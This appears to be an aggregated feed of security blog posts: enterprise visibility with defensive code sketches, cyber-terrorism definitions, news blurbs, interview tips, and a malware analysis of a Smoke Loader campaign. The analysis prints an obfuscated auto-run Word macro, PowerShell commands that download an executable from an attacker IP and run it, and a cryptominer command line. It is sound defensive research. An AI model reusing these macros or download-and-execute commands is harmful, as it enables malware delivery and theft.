We favor cloud architectures which use multiple accounts per application, for many reasons. Overcoming API limits is one; minimizing the blast radius of an attack through stronger functional isolation between applications is another. That’s a much larger discussion for a different day, but see our latest video if you’re interested.

Befriend the Accountants

One general point about cloud services should already be familiar, from many contexts: follow the money. For both SaaS and IaaS, the only thing we can be sure of is that someone is getting paid for any services you use. So whoever pays the bills should be able to let you know – at least at a gross level – which services are in use, with pointers to who can tell you more.

So make sure you are friendly with Accounting. Take them out to lunch from time to time. Support their charitable causes. Whatever it takes to keep them on your side and responsive to your requests for accounting records for cloud services.

Of course an Accounting report is no replacement for pulling information from APIs or monitoring egress traffic. Attackers move fast, and can do a lot of damage in the time it takes a provider to bill you and Accounting to receive and process the bill. Don’t settle for information that lags events by 4-6 weeks. Instead use this kind of data to verify what you should already know, and to identify the stuff you should know about but perhaps don’t yet.
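
As a toy illustration of using the bill as a cross-check, the sketch below compares the set of cloud services Accounting is paying for against the set your monitoring has actually discovered, and flags the gaps in both directions. The CSV layout (a "service" column) and file name are assumptions; adapt them to whatever your finance system exports.

# Minimal sketch: reconcile cloud services on the bill against services
# discovered via egress monitoring and provider APIs.
import csv

def services_from_billing(csv_path):
    # Assumes an export with a "service" column; adjust to your finance system.
    with open(csv_path, newline="") as f:
        return {row["service"].strip().lower() for row in csv.DictReader(f)}

def reconcile(billed, discovered):
    return {
        "paid_for_but_never_seen": sorted(billed - discovered),
        "in_use_but_not_on_the_bill": sorted(discovered - billed),
    }

if __name__ == "__main__":
    billed = services_from_billing("cloud_spend.csv")          # from Accounting
    discovered = {"salesforce", "box", "aws", "unknown-saas"}   # from your monitoring
    for bucket, names in reconcile(billed, discovered).items():
        print(bucket, "->", names)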

Containers

Because containers encapsulate microservices which are often not persistent, and cannot really be accessed or scanned by external tools (like vulnerability scanners), a separate capability to discover and assess containers won’t really work. So you need to build discovery and assessment into your container pipeline. First make sure the containers you build are not vulnerable, by integrating assessment into your container build process. Any container you spin up should be built from an image which is not vulnerable.

Then track usage of your containers to make sure nothing drifts, which requires inserting some kind of technology (an agent or API call) into the build/deploy stage as containers spin up. That technology tracks each container through its lifecycle, reports back to your central repository, and watches for signs of attack. Like most of security, you can’t really bolt this on later. So when you finish buying pizza for Accounting, you might want to schedule a happy hour with the developers. Without their participation you’ll have little visibility into your container environment.
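
As a rough sketch of the runtime-tracking piece, the snippet below uses the Docker SDK for Python to list running containers on a host and flag any whose image is not in an approved set produced by your build pipeline. The approved list is a made-up example, and matching on tags is a simplification; image digests are the stronger identity check in practice.

# Minimal sketch: detect container drift by comparing running containers'
# images against an approved set from the build pipeline.
# Assumes the Docker SDK for Python ("docker" package) and local daemon access;
# APPROVED_IMAGES is illustrative.
import docker

APPROVED_IMAGES = {
    "registry.example.com/payments:1.4.2",
    "registry.example.com/frontend:2.0.1",
}

def find_drifted_containers():
    client = docker.from_env()
    drifted = []
    for container in client.containers.list():
        tags = container.image.tags or ["<untagged>"]
        if not any(tag in APPROVED_IMAGES for tag in tags):
            drifted.append((container.short_id, tags))
    return drifted

if __name__ == "__main__":
    for short_id, tags in find_drifted_containers():
        print(f"unapproved container {short_id} running image(s): {tags}")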

Mobility

It has been a while since you could stick your head in the sand and hope that mobile devices would turn out to be a passing fad. Today they are full participants in the IT environment, and innovative new applications are being rolled out to derive business advantage from their flexibility. But as any technology becomes ubiquitous, solutions emerge to address common problems.

Even after consolidation there are dozens of solutions which provide mobile device visibility and assessment. To access corporate data or install purpose-built mobile apps, any device should be registered with the corporate Mobile Device Management (MDM) environment. These platforms can provide an inventory not just of devices, but also of what is installed on each device. More sophisticated offerings can now block certain apps from running, or stop a device from accessing some networks, based on its configuration and assessment.

That’s the good news, but there is still work to be done to integrate that information into the rest of the Security Decision Support stack. You should be able to use telemetry from your MDM environment in your security analytics strategy. For example a person’s mobile device accessing cloud data stores they aren’t authorized to look at, or their desktop performing reconnaissance on the finance network – or even both! – might well indicate a compromise. Your analytics should detect and connect both events across the enterprise. But let’s not get ahead of ourselves – our next post will dive into analytics.
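
A toy sketch of that cross-source correlation: group events by user, then flag anyone who trips suspicious indicators from more than one source (say, MDM and network telemetry) within a time window. The event records, indicator labels, and 24-hour window are assumptions for illustration; a real pipeline would read from your SIEM or analytics store.

# Minimal sketch: flag users with suspicious events from multiple telemetry
# sources within a time window. Event format and labels are illustrative.
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(hours=24)

events = [
    {"user": "alice", "source": "mdm",     "indicator": "unauthorized_cloud_store",
     "time": datetime(2018, 2, 7, 9, 15)},
    {"user": "alice", "source": "network", "indicator": "finance_net_recon",
     "time": datetime(2018, 2, 7, 11, 42)},
    {"user": "bob",   "source": "mdm",     "indicator": "jailbroken_device",
     "time": datetime(2018, 2, 6, 8, 0)},
]

def multi_source_hits(evts, window=WINDOW):
    by_user = defaultdict(list)
    for e in evts:
        by_user[e["user"]].append(e)
    flagged = []
    for user, user_events in by_user.items():
        for e in user_events:
            nearby_sources = {x["source"] for x in user_events
                              if abs(x["time"] - e["time"]) <= window}
            if len(nearby_sources) > 1:
                flagged.append(user)
                break
    return flagged

if __name__ == "__main__":
    print("possible compromise, worth escalating:", multi_source_hits(events))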

IoT

The problem with most IoT devices is they aren’t your run-of-the-mill PCs or mobile devices. They likely don’t have an API you can poll to figure out what’s going on, nor can you install an agent to monitor all activity. And these devices often appear on network segments which are less monitored and protected, such as the shop floor or the security video network.

Detecting the presence of these devices, assessing their security, and looking for potential misuse all require a different, largely passive approach. Your best bet is to monitor those networks, profile the devices on each one, baseline typical traffic patterns, and then watch for devices acting unusually. That is more challenging than simply collecting NetFlow records from the shop floor network: IoT devices often use non-standard, proprietary protocols, which further complicates discovery and assessment. As you account for these devices in your Security Decision Support strategy, you’ll need to weigh the complexity of identifying and assessing them against the risk they pose.
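
As a simplified sketch of that passive approach, the snippet below builds a per-device baseline of bytes per flow from historical flow records and flags devices whose current traffic deviates sharply. The record format, the sample values, and the 3x threshold are assumptions; real IoT monitoring also has to cope with the proprietary protocols this toy example ignores.

# Minimal sketch: baseline per-device traffic from passively collected flow
# records and flag devices deviating sharply from their own history.
from collections import defaultdict
from statistics import mean

DEVIATION_FACTOR = 3.0   # flag flows 3x larger than the device's baseline

historical_flows = [
    {"device": "10.1.50.11", "bytes": 1200},
    {"device": "10.1.50.11", "bytes": 1350},
    {"device": "10.1.50.12", "bytes": 800},
    {"device": "10.1.50.12", "bytes": 760},
]

current_flows = [
    {"device": "10.1.50.11", "bytes": 1400},
    {"device": "10.1.50.12", "bytes": 9500},   # suspicious spike
]

def baseline(flows):
    per_device = defaultdict(list)
    for f in flows:
        per_device[f["device"]].append(f["bytes"])
    return {device: mean(sizes) for device, sizes in per_device.items()}

def anomalies(flows, baselines, factor=DEVIATION_FACTOR):
    # Devices with no history are skipped here; in practice a brand-new
    # device on a sensitive segment is itself worth flagging.
    return [f for f in flows
            if f["bytes"] > factor * baselines.get(f["device"], float("inf"))]

if __name__ == "__main__":
    for flow in anomalies(current_flows, baseline(historical_flows)):
        print("unusual traffic from", flow["device"], flow["bytes"], "bytes")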

(Re)Visitation

Of course we need a few caveats around these concepts. First, emerging technologies are moving targets. Let’s take IaaS as an example. Like other technology providers, cloud providers are rapidly introducing APIs and other mechanisms to provide a view into their environments. Device makers across all device types realize customers want to manage their technology as part of a larger system, so many (but not all, alas) are providing better access to their innards in more flexible ways. That’s the kind of progress you like to see.

But tomorrow’s promise cannot solve today’s problem. You need to build a process and implement tooling based on what’s available today. So build periodic reassessment into your SDS process, similar to how you probably revisit malware detection periodically.

We know reviewing your enterprise visibility approaches can be time-consuming, and expensive when something needs to change. Reversing course on decisions you made over the past year can be frustrating. But that’s the world we live in, and resisting will just cost you more in the long run. If you expect from the get-go to revisit all these decisions, and at times to toss some tools and embrace others, it becomes easier to take. Even more important, managing management’s expectations that this might happen (it quite likely will) goes a long way toward maintaining your employment.

In summary, the first step toward Security Decision Support is enterprise visibility and understanding the exposure of assets and data, wherever they are. Next we’ll dig into figuring out what’s really at risk by integrating an external view of the security world (threat intel) and more sophisticated analytics of internal security data you collect.

- Mike Rothman

Declaring War on Cyber Terrorism…or Something Like That

This post is co-authored by Deana Shick, Eric Hatleback and Leigh Metcalf

Buzzwords are a mainstay in our field, and "cyberterrorism" currently is one of the hottest. We understand that terrorism is an idea, a tactic for actor groups to execute their own operations. Terrorists are known to operate in the physical world, mostly by spreading fear with traditional and non-traditional weaponry. As information security analysts, we also see products where "terrorists" are ranked in terms of sophistication, just like any other cyber threat actor group. But how does the definition of "terrorism" change when adding the complexities of the Internet? What does the term "cyber terrorism" actually mean?

We identified thirty-seven (37) unique definitions of "cyber terrorism" drawn from academic and international-relations journals, the web, and conference presentations. These definitions date back as far as 1998, with the most recent being published in 2016. We excluded any circular definitions based on the findings in our set. We broke down these definitions into their main components in order to analyze and compare definitions appropriately. The definitions, as a whole, broke into the following thirteen (13) categories, although no single definition included all of them at once:

  • Against Computers: Computers are a necessary target of the action.
  • Criminals: Actions performed are criminal acts, according to the relevant applicable law.
  • Fear: The action is intended to incite fear in the victims.
  • Hacking: The attempt to gain unauthorized access into a targeted network.
  • Religion: Religious tenets are a motivator for performing actions.
  • Socially Motivated: Social constructs motivate the actor to perform actions on objectives.
  • Non-State Actors: Individuals or groups not formally allied to a recognized country or countries.
  • Politics: The political atmosphere and other occurrences within a country or countries motivate action.
  • Public Infrastructure: Government-owned infrastructure is a target of the action.
  • Against the public: Actions performed against a group of people, many of whom are bystanders.
  • Terrorism: Violence perpetrated by individuals to intimidate others into action.
  • Using Computers: Computers are used during actions on objectives.
  • Violence: The use of force to hurt or damage a target.

After binning each part of the definitions into these categories, we found that there is no consensus definition for "cyber terrorism." Our analysis of each definition is found in Figure 1. A factor that might explain the diversity of opinions could be the lack of a singular, agreed upon definition for "terrorism" on the international stage, even before adding the "cyber" adjective. So, what does this mean for us?

In the information security field, vendors, analysts, and researchers tend to slap the term "cyber" onto any actions involving an internet connection. While this may be appropriate in some cases, terrorism does not seem to translate well into bytes and packets. Perhaps this is due to the physical, visceral nature that terrorists require to be successful, or perhaps it is due to the lack of a true use-case of a terrorist group successfully detonating a computer. We should remain mindful as a community not to perpetuate fear, uncertainty, or doubt by using terms and varying adjectives without a common understanding.


Figure 1: Definitions found based on common bins


CUTV News Radio spotlights Michael Peters of Lazarus Alliance


CUTV News Radio, hosted by veteran award-winning broadcast TV and radio hosts and media personalities Jim Masters and Doug Llewelyn, is an exciting, informative, entertaining, thought-provoking and empowering broadcast series featuring several live episodes daily. It is a service of the Telly Award-winning CUTV News, a full-service media company that provides entrepreneurs, business owners and extraordinary people a platform to share their story worldwide.


How to eliminate the default route for greater security

If portions of enterprise data-center networks have no need to communicate directly with the internet, then why do we configure routers so every system on the network winds up with internet access by default?

Part of the reason is that many enterprises use an internet perimeter firewall performing port address translation (PAT) with a default policy that allows access to the internet – a configuration that leaves open a possible path by which attackers can breach security.



Growing North Korean cyber capability

Recent missile launches from the DPRK have received a lot of attention; however, its cyber offensives have also been active and are growing in sophistication. North Korean cyber attack efforts involve around 6,000 military operatives within the structure of the Reconnaissance General Bureau (RGB) – part of the military, of which Kim Jong-un is supreme …

Tactical Sweaters – Enterprise Security Weekly #78

This week, Paul and John interview Brendan O'Connor, Security CTO at ServiceNow, and John Moran, Senior Project Manager of DFLabs! In the news, we have updates from Twistlock, Microsoft, BeyondTrust, and more on this episode of Enterprise Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode78

 

Visit https://www.securityweekly.com/esw for all the latest episodes!

Smoke Loader Campaign: When Defense Becomes a Numbers Game

Authored by Alexander Sevtsov
Edited by Stefano Ortolani

Introduction

Everybody knows that PowerShell is a powerful tool for automating different tasks in Windows. Unfortunately, many bad actors know that it is also a sneaky way for malware to download its payload. A few days ago we stumbled upon an interesting macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16) that makes one too many assumptions about the underlying operating system, and thus sometimes fails to execute.

The Malicious Document

The malicious document contains the following macro code:

Private Sub Document_Open()
    Dim abasekjsh() As Byte, bfjeslksl As String, izhkaheje As Long
    abasekjsh = StrConv(ThisDocument.BuiltInDocumentProperties(Chr(84) + Chr(105) + Chr(116) + _
        Chr(108) + Chr(101)), vbFromUnicode)
    For izhkaheje = 0 To UBound(abasekjsh)
        abasekjsh(izhkaheje) = abasekjsh(izhkaheje) - 6
    Next izhkaheje
    bfjeslksl = StrReverse(StrConv(abasekjsh, vbUnicode))
    Shell (Replace(Replace(Split(bfjeslksl, "|")(1), Split(bfjeslksl, "|")(0), Chr(46)), _
        "FPATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub

The macro itself is nothing special: it first reads the “Title” property by accessing the BuiltInDocumentProperties of the current document. The property value is then used to decode a PowerShell command line, which is eventually executed via the Shell method.
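
For readers who prefer not to step through the VBA, here is a rough Python equivalent of the decoding logic, assuming the encoded command sits in the document's Title property: subtract 6 from each byte, reverse the string, split on "|", substitute the first token back in as a literal dot, and expand the FPATH placeholder with the document's path. The encode_title helper and the sample values exist only to build a benign round-trip test; they do not reproduce the actual payload.

# Minimal sketch (for clarity only) of the macro's decoding routine.
def decode_title(title, doc_path):
    shifted = "".join(chr(ord(c) - 6) for c in title)   # the byte-wise "- 6" loop
    reversed_str = shifted[::-1]                        # StrReverse
    dot_token, command = reversed_str.split("|", 1)     # Split(...)(0) and (1)
    command = command.replace(dot_token, ".")           # Replace token with Chr(46)
    return command.replace("FPATH", doc_path)           # expand the document path

def encode_title(command, dot_token="#"):
    # Inverse operation, used here only to build a harmless test value.
    staged = dot_token + "|" + command.replace(".", dot_token)
    return "".join(chr(ord(c) + 6) for c in staged[::-1])

if __name__ == "__main__":
    benign = encode_title("powershell.exe -w 1 Write-Host FPATH")
    print(decode_title(benign, r"C:\Users\victim\invoice.doc"))
    # -> powershell.exe -w 1 Write-Host C:\Users\victim\invoice.doc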

The PowerShell Downloader

Instead of using sophisticated evasion techniques, the malware relies on a feature available from PowerShell 3.0 onwards. To download the malicious code the command invokes the Invoke-WebRequest cmdlet:

powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');
powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');

This tiny detail has the side-effect of requiring Windows 8 and above for the command to complete successfully. Note that although PowerShell comes installed by default since Windows 7, PowerShell 3.0 is only available on Windows 7 as an optional update. Therefore any network activity can only be observed if the underlying operating system is at least Windows 8, or if Windows 7 has the specific update installed. In other words, the more diversity between our analysis environments, the more chances we can elicit the malicious behavior.

Payload – Smoke Loader

The payload is a variant of the Smoke Loader family (Figure 1) which shows quite a number of different activities when analyzed by the Lastline sandbox (sha1: f227820689bdc628de34cc9c21000f3d458a26bf):

Figure 1. Analysis overview of the Smoke Loader

As often happens, signatures are not very informative, as we can see in Figure 2.

Figure 2. VT detection of the Smoke Loader

The aim of this malware is to download other components by sending 5 different POST requests to microsoftoutlook[.]bit/email/send.php. While some are met with a 404 error, three are successful and download the following payloads:

  • GlobeImposter Ransomware eventually displaying the ransom note in Figure 3.

    Figure 3. Ransom note of the GlobeImposter Ransomware delivered by the Smoke Loader.

  • Zeus trojan banker, also known as Zbot, capturing online banking sessions and stealing credentials from known FTP clients, such as FlashFXP, CuteFtp, WsFTP, FileZilla, BulletProof FTP, etc.
  • Monero CPU miner based on the open source XMRig project (as indicated by some of the strings included in the binary, see Figure 4). The command used to spawn the miner reveals a well-known pool ID we have already been seeing:

wuauclt.exe -o stratum+tcp://ca.minexmr.com:443 -u 49X9ZwRuS6JR74LzwjVx2tQRQpTnoQUzdjh76G3BmuJDS7UKppqjiPx2tbvgt27Ru6YkULZ4FbnHbJZ2tAqPas12PV5F6te.smoke30+10000 -p x --safe

Figure 4. XMRig Monero CPU miner

Intelligence

It’s worth mentioning that this is not the first time we have seen the IP address from which the loader is downloaded. Based on our intelligence records, another malicious VBA-based document file (sha1: 03a06782e60e7e7b724a0cafa19ee6c64ba2366b) called a similar PowerShell script that executed perfectly on a default Windows 7 installation:

powershell $webclient = new-object System.Net.WebClient;
$myurls = 'http://80.82.67[.]217/moo.jpg'.Split(',');
$path = $env:temp + '\~tmp.exe';
foreach($myurl in $myurls) {
    try {
        $webclient.DownloadFile($myurl.ToString(), $path);
        Start-Process $path;
        break;
    } catch {}
}

This variant downloads the payload by invoking the DownloadFile method from the System.Net.WebClient class, indeed a much more common (and backward compatible) approach to retrieve a remote resource.

Mitigation

There is an inherent problem with dynamic analysis: which version of the underlying operating system should be used? To address this issue, the Lastline engine is capable of running deep behavioral analysis on several different operating systems, increasing the probability of a successful execution. Moreover, application bundles (see previous article for more details) can be further used to shape the analysis environment when additional requirements are needed to elicit the malicious behavior.

Figure 5 shows what the analysis overview looks like when analyzing the sample discussed in this article: besides some reported structural anomalies, which are detected by our static document analysis, we can see that dynamic behaviors are exhibited only in Windows 10.

Figure 5. Analysis overview of the malicious macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16)

Conclusion

In this article, we analyzed a malicious macro-based document that relies on a specific version of PowerShell to deliver a sophisticated multi-component malware, Smoke Loader. It does so by calling a cmdlet not normally available in the version of PowerShell installed by default on Windows 7, showing once more that operating system diversity is a key requirement for successful dynamic analysis.

Appendix: IoCs

Files

  • The Malicious Document: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16
  • Smoke Loader: f227820689bdc628de34cc9c21000f3d458a26bf
  • Monero CPU Miner: 88eba5d205d85c39ced484a3aa7241302fd815e3
  • Zeus Trojan: 54949587044a4e3732087a56bc1d36096b9f0075
  • GlobeImposter Ransomware: f3cd914ba35a79317622d9ac47b9e4bfbc3b3b26

Network

  • 80.82.67[.]217
  • 107.181.254[.]15
  • Smoke Loader C&C: microsoftoutlook[.]bit

The post Smoke Loader Campaign: When Defense Becomes a Numbers Game appeared first on Lastline.

Interview Tips: You’re in the interview room. Now what?


In my last blog post, Interview Tips: Prepare well before you take off, I covered the facts you need to be sure of before you reach the door of your next firm, or pick up the call that will decide your next lap. This post focuses on things to do during the interview – things that can make or break your attempt. It is imperative to be clear about what you want, what the company does, and where you see yourself in a few years. If this sounds new to you, please take a look at my previous blog post on preparation tips.

1. Basic manners, greetings and eye contact.

When you meet your employer, understand that you are a professional going for an interview – not for chit-chat, not for coffee, not for a catch-up. The first impression with the interviewer is often the lasting one. So, while you are wearing your nicely ironed clothes, it's also time to sit straight and keep a notepad with you. It's vital that you learn from the discussion, so keep taking notes. If there's something you don't know, jot down a pointer so you can cross-check after your talk. It will show your keenness to learn, pay attention, and follow up on the discussion.
When you meet the interviewer for the first time, make sure you get their name right, or ask for their business card. You can address them by their name; if you are not sure it is culturally appropriate, ask whether it's okay to do so. Then introduce yourself with your full name and a confident handshake. After the interview, thank them for taking the time to meet with you.

Update (01-Feb-2018): Thanks to PKI for a great tip that I missed mentioning.


2. Avoid long essays, and be "to the point".

I have seen many times that candidates carry themselves with utter confidence (or some excitement) but start their responses like a long narration. Sometimes it's long enough that I have to interrupt their train of thought. A rule of thumb: if the question is objective, answer it in 30 seconds, plus another minute if you want to back it up with a fact. If it's subjective, like "why does this happen..." or "how would you...", restrict yourself to summarising it in 2-3 minutes unless you are asked to tell more.

If it's a question that involves historical events, tell the interviewer which chronological direction you are starting from, and then bring it to a conclusion. If the interviewer wants to know more, they will ask you to elaborate. But stick to the 2-3 minute rule per lap, and then take a pit stop. Some typical questions you must prepare for:

  1. Why should we hire you?
    Try highlighting your skill set and how it matches what they are looking for.
    Find their pain points and the technologies they are using, and explain how your experience can help them succeed.
  2. Tell me about yourself.
    Focus on facts that supplement your resume. If the interviewer has already gone through your resume, surprise them with something that's not mentioned in it.
  3. Do you have any questions?
    Make sure you do. If you have prepared well on the firm, you will definitely have curiosities and queries.
3. Justify your answers, if required. Good or bad, but don't be a headless reporter.

If an interviewer asks you to elaborate on your answer, it means they are looking for more details to assess whether you can walk the talk. Don't worry about the fact that they are judging you; just be upfront about where you got the answer. Even if you just took a guess, tell them. Or, if you remember the answer but not the rationale, convey that frankly.
Needless to say, if you try to go deep into a well of lies, excuses and fabricated stories, you may just drown in the follow-up questions. Don't dig your well deeper with more made-up facts. An interviewer will at least appreciate that you are reliable; it's understandable if you don't remember the exact reasoning or every event, as long as you gave your best, honest attempt. In sales there is a phrase – "stop putting lipstick on a pig" – which means stop dressing up second-rate or faulty products with smart marketing, as it may bring a short-term win but a long-term loss.
In the end, you want to sell yourself as a rational person who does not make decisions without factual information to back them up. I admire gut feeling and intuition, but if that's what it was, tell the interviewer the answer was a "gut feeling" answer, and don't build stories around it.

4. Be present in the moment. Control yourself, and don't get carried away.

A vital part of the interview process is assessing the candidate's presence of mind. I usually check their basics, their presence of mind, and their awareness of what's happening around them. In any domain, it is imperative to be aware of what is happening, what the recent headlines around security topics are, and how the world is reacting to the evolution in your forte.
I remember meeting a candidate for an interview, and even though it was a technical interview, my questions came from his blog. He had written some articles on security and was hosting them on a popular CMS. I asked a few questions about his blog – why did you install this plugin, what does it do, and so on. I wanted to check his awareness of the topics, and specifically of the technology he was using for his blog. Sometimes what matters is your depth in a particular field, and it is often assessed by taking you out of your comfort zone of mundane questions. He fumbled, but kept trying to answer the questions with his best effort and understanding.
He might have failed the Q&A, but because of his approach and his tenacity to improvise, he was selected.

It is essential to assess how someone approaches a problem statement. So, if you think you don't know the answer but can attempt to take it on, tell the interviewer that you don't see a straightforward solution, but that you can try to work through it with logic, experience, and some thought. That doesn't mean you get 30 minutes just to answer this one question. Be quick on your toes to frame your strategy, and it's okay to think out loud. Keep the interviewer in sync with your analysis of the problem statement so they can understand your approach and where it might lead.

5. A rejection doesn't mean you lost the war; not always!

Personal experience: I went through multiple rounds of interviews with a firm. The first-level interview was with a senior team-lead type, then his manager, then HR, and even a management round. They were not sure whether I fit the bill, so they decided to hold a final round with the director. Long story short, after two months of interviews I got an email which, in short, meant "Thanks, we don't need you." I felt bad that after investing considerable time over the last few months, all I received was a "no". Knowing the company well, and having had good discussions, I believed I was a good fit, but there might have been other reasons. Anyway, during those two months I had done plenty of research on the company, its people, the common pitfalls it had run into, and so on. In all the interviews, I asked enough questions to assert my value proposition.

I wrote them back (keeping each interviewer in the loop) – "Thanks for your time, and I understand your decision. I may not agree with it, given that currently you have ..." I listed some problem statements and how I could contribute effective solutions. In short, it was my last pitch, selling my skill set and my willingness to iron out some wrinkles with full tenacity but a humble gesture. I concluded the note with "I appreciate your time, and I wish you the best in your future endeavours."

Frankly speaking, I had no intention other than to appreciate the discussions and their help in my learning curve – all in good faith and courtesy. A few days later, I got an email from HR indicating that they wanted to hire me after all. A few formalities later, the firm offered me a position!

Bonus:

Share this blog via your social media channel as a 'public' post, and comment below with a link to it. I shall share a "tailored guide" for your next interview.
*Reserved for the first five people only.

I wish you all the best and hope you find your match :)